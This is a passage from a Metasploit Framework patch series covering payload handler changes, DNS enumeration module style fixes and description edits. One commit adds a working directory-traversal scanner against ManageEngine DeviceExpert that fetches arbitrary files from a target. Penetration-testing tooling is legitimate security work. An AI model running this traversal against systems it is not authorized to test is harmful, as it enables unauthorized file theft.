matches a given checksum # def generate_uri_checksum(sum) - - # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(5) + uri = Rex::Text.rand_text_alphanumeric(4) return uri if Rex::Text.checksum8(uri) == sum end - - # Otherwise return one of the pre-calculated strings - return URI_CHECKSUM_PRECALC[sum] + raise RuntimeError, "Unable to generate a string with checksum #{sum}" end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index b873a279d3..0867ef01dc 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -37,11 +37,6 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. From 5cacf5f8f652b91f952d332d84ad00229e9b2848 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 12:28:21 -0500 Subject: [PATCH 18/46] A still cleaner checksummed URI generator Now with http and https support. --- lib/msf/core/handler/reverse_http.rb | 6 +++--- lib/msf/core/handler/reverse_https.rb | 5 +---- 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index dc241353cc..148e78dd46 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -65,9 +65,9 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) - return uri if Rex::Text.checksum8(uri) == sum + uri = Rex::Text.rand_text_alphanumeric(3) + ("a".."z").sort_by {rand}.each do |x| + return(uri + x) if Rex::Text.checksum8(uri + x) end raise RuntimeError, "Unable to generate a string with checksum #{sum}" end diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 0867ef01dc..da94a3f670 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -66,13 +66,10 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - urix = nil uri = Rex::Text.rand_text_alphanumeric(3) ("a".."z").sort_by {rand}.each do |x| - urix = (uri + x) if Rex::Text.checksum8(uri + x) - break if urix + return(uri + x) if Rex::Text.checksum8(uri + x) end - return urix if urix raise RuntimeError, "Unable to generate a string with checksum #{sum}" end From 19fc8d9883f69aa7bd55bc96a620c5cc1d7caed8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Mar 2012 12:42:24 -0500 Subject: [PATCH 19/46] Add OSVDB-80262 --- .../scanner/http/manageengine_traversal.rb | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) create mode 100644 modules/auxiliary/scanner/http/manageengine_traversal.rb diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_traversal.rb new file mode 100644 index 0000000000..c5c099cd56 --- /dev/null +++ b/modules/auxiliary/scanner/http/manageengine_traversal.rb @@ -0,0 +1,81 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in ManageEngine + DeviceExpert's ScheduleResultViewer Servlet. This is done by using + "..\..\..\..\..\..\..\..\..\..\" in the path in order to retrieve a file on a + vulnerable machine. Please note that the SSL option is required in order to send + HTTP requests. + }, + 'References' => + [ + [ 'OSVDB', '80262'], + [ 'URL', 'http://retrogod.altervista.org/9sg_me_adv.htm' ] + ], + 'Author' => + [ + 'rgod', #Discovery + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Mar 18 2012" + )) + + register_options( + [ + Opt::RPORT(6060), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']) + ], self.class) + + deregister_options('RHOST') + end + + def run_host(ip) + traverse = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\" + filename = datastore['FILEPATH'] + + res = send_request_raw({ + 'uri' => "/scheduleresult.de/?FileName=#{traverse}#{filename}", + 'method' => 'GET' + }, 25) + + if res + print_status("#{ip}:#{rport} returns: #{res.code.to_s}") + else + print_error("Unable to communicate with #{ip}:#{rport}") + return + end + + if res.body.empty? + print_error("#{ip}:#{rport} - no file downloaded (empty)") + else + fname = File.basename(datastore['FILEPATH']) + path = store_loot( + 'manageengine.http', + 'application/octet-stream', + ip, + res.body, + fname) + + print_status("#{ip}:#{rport} - File saved in: #{path}") + end + + end +end \ No newline at end of file From 79d74b87687ea44fdc4cb5c88c1f89679c36cda2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Mar 2012 12:58:18 -0500 Subject: [PATCH 20/46] ADD OSVDB-80262 --- modules/auxiliary/scanner/http/manageengine_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_traversal.rb index c5c099cd56..dad6dcb052 100644 --- a/modules/auxiliary/scanner/http/manageengine_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_traversal.rb @@ -76,6 +76,6 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip}:#{rport} - File saved in: #{path}") end - end + end \ No newline at end of file From dc6f76eb207fff134fd3778bbf5a9459e0c578a7 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:08:39 -0500 Subject: [PATCH 21/46] Style fixes for enum_dns.rb * Use a dotted.notation for note types * Changed title to something more descriptive * Expanded description * Other trivial changes --- modules/auxiliary/gather/enum_dns.rb | 61 +++++++++++++++------------- 1 file changed, 32 insertions(+), 29 deletions(-) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index d33f3fe9e9..b73e5b0532 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -17,10 +17,13 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Enumeration Module', + 'Name' => 'DNS Record Scanner and Enumerator ', 'Description' => %q{ - This module can be used to enumerate various types of information - about a domain from a specific DNS server. + This module can be used to enumerate various types of information + about a domain from a specific DNS server by performing various + DNS queries such as zone transfers, reverse lookups, SRV record + bruteforcing, and other techniques. + }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, @@ -35,17 +38,17 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), - OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone Transfer against each NS record', true]), - OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing TLD and testing against IANA TLD list', false]), + OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone transfer against each NS record', true]), + OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing the TLD and testing against IANA TLD list', false]), OptBool.new('ENUM_STD', [ true, 'Enumerate standard record types (A,MX,NS,TXT and SOA)', true]), - OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via wordlist', false]), + OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via the supplied wordlist', false]), OptBool.new('ENUM_IP6', [ true, 'Brute force hosts with IPv6 AAAA records',false]), OptBool.new('ENUM_RVL', [ true, 'Reverse lookup a range of IP addresses', false]), OptBool.new('ENUM_SRV', [ true, 'Enumerate the most common SRV records', true]), - OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptPath.new('WORDLIST', [ false, "Wordlist for domain name bruteforcing", ::File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries (default is system DNS)" ]), OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]), - OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false]) + OptBool.new('STOP_WLDCRD', [ true, 'Stops bruteforce enumeration if wildcard resolution is detected', false]) ], self.class) register_advanced_options( @@ -101,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{target},A") end end @@ -116,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{ip.address.to_s},#{rr.mname},SOA") end end @@ -134,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{ip.address.to_s},#{rr.nsdname},NS") end end @@ -148,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.exchange},MX") end end @@ -160,7 +163,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.txt},TXT") end end @@ -172,7 +175,6 @@ class Metasploit3 < Msf::Auxiliary if not nssrv.nil? @res.nameserver=(nssrv) end - print_status("Performing Top Level Domain Expansion") i, a = 0, [] tlds = [ "com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz", @@ -199,6 +201,7 @@ class Metasploit3 < Msf::Auxiliary "ug", "ua", "ae", "gb", "us", "um", "uy", "uz", "vu", "ve", "vn", "vg", "vi", "wf", "eh", "ye", "yu", "za", "zr", "zm", "zw", "int", "gs", "info", "biz", "su", "name", "coop", "aero" ] + print_status("Performing Top Level Domain expansion using #{tlds.size} TLDs") tlds.each do |tld| query1 = @res.search("#{target}.#{tld}") @@ -209,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53, - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{target}.#{tld},A") if rr.class == Net::DNS::RR::A end end @@ -235,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{line.chomp}.#{target},A") next unless rr.class == Net::DNS::RR::CNAME end @@ -263,7 +266,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{line.chomp}.#{target},AAAA") next unless rr.class == Net::DNS::RR::CNAME end @@ -297,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{addresstp},#{tip},A") end rescue ::Interrupt @@ -370,7 +373,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "Zone Transfer Successful") #Prints each record according to its type zone.answer.each do |rr| @@ -381,7 +384,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{rr.name},A") when "SOA" print_status("Name: #{rr.mname} Record: SOA") @@ -389,7 +392,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.name},SOA") when "MX" print_status("Name: #{rr.exchange} Preference: #{rr.preference} Record: MX") @@ -397,7 +400,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.exchange},MX") when "CNAME" print_status("Name: #{rr.cname} Record: CNAME") @@ -405,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.cname},CNAME") when "HINFO" print_status("CPU: #{rr.cpu} OS: #{rr.os} Record: HINFO") @@ -413,7 +416,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "CPU:#{rr.cpu},OS:#{rr.os},HINFO") when "AAAA" print_status("IPv6 Address: #{rr.address} Record: AAAA") @@ -421,7 +424,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s}, AAAA") when "NS" print_status("Name: #{rr.nsdname} Record: NS") @@ -429,7 +432,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.nsdname},NS") when "TXT" print_status("Text: #{rr.txt} Record: TXT") @@ -437,7 +440,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.txt},TXT") when "SRV" print_status("Host: #{rr.host} Port: #{rr.port} Priority: #{rr.priority} Record: SRV") @@ -445,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.host},#{rr.port},#{rr.priority},SRV") end end From 14b45f9fb129bbe246c6d4c7ea365eb9261958db Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:14:04 -0500 Subject: [PATCH 22/46] More fixes to enum_dns.rb * Should use 'and', not & (bitwise AND) * Made capitalization sane for Anglophones. See: http://owl.english.purdue.edu/owl/resource/592/1/ --- modules/auxiliary/gather/enum_dns.rb | 46 ++++++++++++++-------------- 1 file changed, 23 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index b73e5b0532..78e5063977 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") if query.answer.length != 0 - print_status("This Domain has Wildcards Enabled!!") + print_status("This domain has wildcards enabled!!") query.answer.each do |rr| print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME end @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Auxiliary end #--------------------------------------------------------------------------------- def genrcd(target) - print_status("Retrieving General DNS Records") + print_status("Retrieving general DNS records") query = @res.search(target) if (query) query.answer.each do |rr| next unless rr.class == Net::DNS::RR::A - print_status("Domain: #{target} IP Address: #{rr.address} Record: A ") + print_status("Domain: #{target} IP address: #{rr.address} Record: A ") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary query1 = @res.search(rr.mname) if (query1) query1.answer.each do |ip| - print_status("Start of Authority: #{rr.mname} IP Address: #{ip.address} Record: SOA") + print_status("Start of Authority: #{rr.mname} IP address: #{ip.address} Record: SOA") report_note(:host => ip.address.to_s, :proto => 'udp', :sname => 'dns', @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary if (query1) query1.answer.each do |ip| next unless ip.class == Net::DNS::RR::A - print_status("Name Server: #{rr.nsdname} IP Address: #{ip.address} Record: NS") + print_status("Name Server: #{rr.nsdname} IP address: #{ip.address} Record: NS") report_note(:host => ip.address.to_s, :proto => 'udp', :sname => 'dns', @@ -207,7 +207,7 @@ class Metasploit3 < Msf::Auxiliary query1 = @res.search("#{target}.#{tld}") if (query1) query1.answer.each do |rr| - print_status("Domain: #{target}.#{tld} Name: #{rr.name} IP Address: #{rr.address} Record: A ") if rr.class == Net::DNS::RR::A + print_status("Domain: #{target}.#{tld} Name: #{rr.name} IP address: #{rr.address} Record: A ") if rr.class == Net::DNS::RR::A report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- def dnsbrute(target, wordlist, nssrv) - print_status("Running Brute Force against Domain #{target}") + print_status("Running bruteforce against domain #{target}") arr = [] i, a = 0, [] ::File.open(wordlist, "rb").each_line do |line| @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary if (query1) query1.answer.each do |rr| if rr.class == Net::DNS::RR::A - print_status("Host Name: #{line.chomp}.#{target} IP Address: #{rr.address.to_s}") + print_status("Hostname: #{line.chomp}.#{target} IP address: #{rr.address.to_s}") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -249,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- def bruteipv6(target, wordlist, nssrv) - print_status("Brute Forcing IPv6 addresses against Domain #{target}") + print_status("Bruteforcing IPv6 addresses against domain #{target}") arr = [] i, a = 0, [] arr = IO.readlines(wordlist) @@ -261,7 +261,7 @@ class Metasploit3 < Msf::Auxiliary if (query1) query1.answer.each do |rr| if rr.class == Net::DNS::RR::AAAA - print_status("Host Name: #{line.chomp}.#{target} IPv6 Address: #{rr.address.to_s}") + print_status("Hostname: #{line.chomp}.#{target} IPv6 Address: #{rr.address.to_s}") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -280,7 +280,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- def reverselkp(iprange,nssrv) - print_status("Running Reverse Lookup against ip range #{iprange}") + print_status("Running reverse lookup against IP range #{iprange}") if not nssrv.nil? @res.nameserver = (nssrv) end @@ -295,7 +295,7 @@ class Metasploit3 < Msf::Auxiliary begin query = @res.query(tip) query.each_ptr do |addresstp| - print_status("Host Name: #{addresstp} IP Address: #{tip.to_s}") + print_status("Hostname: #{addresstp} IP address: #{tip.to_s}") report_note(:host => tip, :proto => 'udp', :sname => 'dns', @@ -323,7 +323,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- #SRV Record Enumeration def srvqry(dom,nssrv) - print_status("Enumerating SRV Records for #{dom}") + print_status("Enumerating SRV records for #{dom}") i, a = 0, [] #Most common SRV Records srvrcd = [ @@ -350,7 +350,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- #For Performing Zone Transfers def axfr(target, nssrv) - print_status("Performing Zone Transfer against all nameservers in #{target}") + print_status("Performing zone transfer against all nameservers in #{target}") if not nssrv.nil? @res.nameserver=(nssrv) end @@ -358,7 +358,7 @@ class Metasploit3 < Msf::Auxiliary query = @res.query(target, "NS") if (query.answer.length != 0) (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |nsrcd| - print_status("Testing Nameserver: #{nsrcd.nsdname}") + print_status("Testing nameserver: #{nsrcd.nsdname}") nssrvquery = @res.query(nsrcd.nsdname, "A") begin nssrvip = nssrvquery.answer[0].address.to_s @@ -368,18 +368,18 @@ class Metasploit3 < Msf::Auxiliary if zone.answer.length != 0 namesrvips = @res.query(nsrcd.nsdname,"A") nsip = namesrvips.answer[0] - print_status("Zone Transfer Successful") + print_status("Zone transfer successful") report_note(:host => nsip.address.to_s, :proto => 'udp', :sname => 'dns', :port => 53 , :type => 'dns.enum', - :data => "Zone Transfer Successful") + :data => "Zone transfer successful") #Prints each record according to its type zone.answer.each do |rr| case rr.type when "A" - print_status("Name: #{rr.name} IP Address: #{rr.address} Record: A ") + print_status("Name: #{rr.name} IP address: #{rr.address} Record: A ") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -453,10 +453,10 @@ class Metasploit3 < Msf::Auxiliary end end else - print_error("Zone Transfer Failed") + print_error("Zone transfer failed") end rescue - print_error("Zone Transfer Failed") + print_error("Zone transfer failed") end end @@ -482,15 +482,15 @@ class Metasploit3 < Msf::Auxiliary end if(datastore['ENUM_BRT']) - if wldcrd & datastore['STOP_WLDCRD'] - print_status("Wildcard Record Found!") + if wldcrd and datastore['STOP_WLDCRD'] + print_error("Wildcard record found!") else dnsbrute(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS']) end end if(datastore['ENUM_IP6']) - if wldcrd & datastore['STOP_WLDCRD'] + if wldcrd and datastore['STOP_WLDCRD'] print_status("Wildcard Record Found!") else bruteipv6(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS']) From d95d60670e4cd86590180d2e3e27f20dcf78d043 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:20:00 -0500 Subject: [PATCH 23/46] Fix up desc again on enum_dns --- modules/auxiliary/gather/enum_dns.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 78e5063977..9cca3b78a8 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -19,10 +19,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'DNS Record Scanner and Enumerator ', 'Description' => %q{ - This module can be used to enumerate various types of information - about a domain from a specific DNS server by performing various - DNS queries such as zone transfers, reverse lookups, SRV record - bruteforcing, and other techniques. + This module can be used to gather information about a domain from a + given DNS server by performing various DNS queries such as zone + transfers, reverse lookups, SRV record bruteforcing, and other techniques. }, 'Author' => [ 'Carlos Perez ' ], From 8fbf4cf6d9d68be69eb18cf2a2dfc47183c97c5a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:23:54 -0500 Subject: [PATCH 24/46] Grammar on dns_txt_query_exec payload name and desc --- modules/payloads/singles/windows/dns_txt_query_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index 37b91b12d8..74286ba8bb 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -14,8 +14,8 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'DNS TXT Record Payload Download Execution', - 'Description' => 'Performs a TXT query against a series of DNS record(s) & executes the returning payload', + 'Name' => 'DNS TXT Record Payload Download and Execution', + 'Description' => 'Performs a TXT query against a series of DNS record(s) and executes the returned payload', 'Author' => [ 'corelanc0d3r ' From 7a74cc7694a2c70cb5017e41170794631a16e076 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:26:40 -0500 Subject: [PATCH 25/46] Quoting "Chicken of the VNC" Otherwise, this looks like a nonsense string to people not familiar with this application. --- modules/post/osx/gather/enum_chicken_vnc_profile.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index 80bbe010ad..697e30318e 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -17,11 +17,11 @@ class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, - 'Name' => 'OSX Gather Chicken of the VNC Profile ', + 'Name' => 'OSX Gather Chicken of the VNC Profile', 'Description' => %q{ - This module will download Chicken of the VNC client's profile file, - which is used to store other VNC server's information such as the - IP and password. + This module will download the "Chicken of the VNC" client application's + profile file, which is used to store other VNC servers' information such + as as the IP and password. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Post end end -end \ No newline at end of file +end From 84197a89033ea4330e177002d245bf88fbc2d53c Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 15:40:43 -0600 Subject: [PATCH 26/46] Return a proper value instead of a silly print --- lib/msf/core/post/windows/registry.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb index d360e1e92d..38ac73cfec 100644 --- a/lib/msf/core/post/windows/registry.rb +++ b/lib/msf/core/post/windows/registry.rb @@ -429,7 +429,7 @@ protected deleted = session.sys.registry.delete_key(root_key, base_key) return deleted rescue Rex::Post::Meterpreter::RequestError => e - print_status "curses, foiled again" + return nil end end From e13535400b4f65285a9ba698d4839e99046d68ab Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 15:41:08 -0600 Subject: [PATCH 27/46] Add exception logging for test failures --- test/lib/module_test.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/test/lib/module_test.rb b/test/lib/module_test.rb index ff0e7c9bc2..6dd27c701b 100644 --- a/test/lib/module_test.rb +++ b/test/lib/module_test.rb @@ -33,6 +33,8 @@ module ModuleTest rescue ::Exception => e print_error("FAILED: #{msg}") print_error("Exception: #{e.class} : #{e}") + dlog("Exception in testing - #{msg}") + dlog("Call stack: #{e.backtrace.join("\n")}") return end From d6ba1d3a32f7f2ea7192377e48ab6595438e74dc Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 15:41:26 -0600 Subject: [PATCH 28/46] Convert registry tests to 